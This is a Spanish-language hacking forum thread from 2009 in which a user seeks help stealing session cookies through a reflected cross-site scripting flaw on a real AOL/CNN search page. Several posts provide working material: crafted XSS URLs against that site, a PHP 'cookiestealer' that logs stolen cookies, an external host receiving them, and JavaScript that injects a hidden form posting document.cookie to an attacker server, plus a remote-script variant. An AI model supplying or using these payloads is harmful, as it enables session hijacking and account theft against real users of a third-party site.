Necesito ayuda con xss. La cookie esta muy larga.

Iniciado por cool0403, 28 Noviembre 2009, 18:30 PM

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1 2
Acciones del Usuario

cool0403

28 Noviembre 2009, 18:30 PM
okay tengo un problema pasando la cookie a mi cookiestealer.php.

El problema que tengo es que no puedo pasar todo el contenido de la cookie, porque la cookie tiene mas de 255 characters y cuando la paso con GET mi cookiestealer.php no recive toda la cookie.

Hay una manera de guardar la cookie en partes con nombres, osea acceder la cookie por sección embes de todo junto.porque no puedo poner todo el contenido de la cookie con un GET command en la url porque hay un limite de 255 characters en la url.

jdc

#1
28 Noviembre 2009, 18:34 PM
Y sí lo pasas por post?

cool0403

#2
28 Noviembre 2009, 18:42 PM

okay ese es el link

Código [Seleccionar]
http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.cookie.length%29%3C/script%3E&query=query1

si te fijas la cookie tiene 698 characters,no pasaria toda la cookie con un GET command. Como lo haria con un post, que no hay otra manera de pasar toda la cookie parte a parte.

WHK

#3
28 Noviembre 2009, 18:58 PM
Hola, puedes utilizar una petición post con xmlhttp desde javascript o insertando un nuevo .js al código desde el xss y manipulas a tu antojo el .js para que pueda enviarte la cookie ya sea en trocitos o serializada.

También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post.

Si no sabes que es una petición post te sugiero que leas un manual básico acerca de xss y código html para que puedas aprender como funciona un formulario web.

La otra opción sería que le preguntes directamente a la persona que descubrió el xss:
http://www.xssed.com/mirror/62113/

Si quieres aprender puedes leer estos tutos para que comienzes con lo básico:
http://foro.elhacker.net/nivel_web/diccionario_informatico_sobre_bugs_y_exploits_en_nivel_web_v10-t264007.0.html
http://foro.elhacker.net/desarrollo_web-b7.0/
http://en.wikipedia.org/wiki/POST_%28HTTP%29
http://www.subgurim.net/Articulos/ajax-y-javascript/54/ajax-a-pelo-xmlhttprequest.aspx
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_261109-t244090.0.html

Saludos.

cool0403

#4
28 Noviembre 2009, 19:01 PM
Okay gracias despues regreso voy a escuchar y hacer lo que me  dijo WHK

WHK

#5
28 Noviembre 2009, 20:52 PM
Genial!, si tienes alguna duda con alguna lectura nos avisas y vemos en que te podemos ayudar.

cool0403

#6
28 Noviembre 2009, 21:35 PM
Okay primeramente gracias por tu ayuda en tu primer post.Los links no me ayudaron para decirte la verdad pero me ayudo lo que me dijiste de
"También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post."

Eso fue lo que me ayudo mas.

Okay aqui esta mi nuevo link nadamas que ahora tengo otro problema , pero es mejor que antes

http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.forms
  • .elements[1].value=document.cookie%29;alert%28document.forms[0].action%20=%20%27http://gotcookie1.orgfree.com/cookiestealer.php%27%29;alert%28document.forms
  • .submit%28%29%29%3C/script%3E&query=query1

    si te fijas . hice lo que tu me dijiste , cambie 3 cosas.
    El action, ha el php de mi cookiestealer.php
    Puse la cookie en Query1
    y la hice submit.
    Pero cuando clickeo en link me dice 'undefined'

    y ese es my cookiestealer.php
    <?php
    $cookie = urldecode($_POST['q']);
    $fp = fopen("log.txt", "a");
    fwrite($fp, "$cookie \n");
    fclose($fp);
    ?>

WHK

#7
29 Noviembre 2009, 08:16 AM Ultima modificación: 29 Noviembre 2009, 08:20 AM por WHK
Si quieres ahorrar código puedes inyectar esto en formato HTML:
Código [Seleccionar]
<script src="http://miweb.com/xss.js"></script>

Entonces trabajas sobre archivo de ‭‬‭‬javascript y vas reuniendo variables y vas creando inputs y te envías la petición:

xss.js
Código [Seleccionar]

try{
 payload =  '<form name="xss_form" id="xss_form" action="http://miweb.com/xss.php" method="post">';
 payload += '<input type="hidden" name="cookie" value="' + escape(document.cookie) + '" />';
 payload += '</form>';
 document.write(payload);
 document.xss_form.submit();
}catch(e){}


Ahora puedes unir todo en un solo archivo php donde si llega una petición post entonces procesa los datos y lo guarda y redirecciona a google y si no llega ninguna peticion post entonces que se muestre el contenido del ‭‬‭‬javascript, así puedes lanzar el xss con la url hacia tu php:
Código [Seleccionar]
<script src="http://miweb.com/xss.php"></script>

Ahora otra forma sería hacer un document.location hacia '#' + document.cookie y despues haces una segunda redirección hacia tu script y obtienes la cookie desde la referencia :P

Saludos.

shimpei

#8
30 Noviembre 2009, 06:18 AM
estimado WHK como seria un ejemplo de ese ultimo?
DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.soportedsr.ar.gd

WHK

#9
30 Noviembre 2009, 06:28 AM
ese ultimo era el ejemplo xD
Imprimir
Ir Arriba Páginas1 2
Acciones del Usuario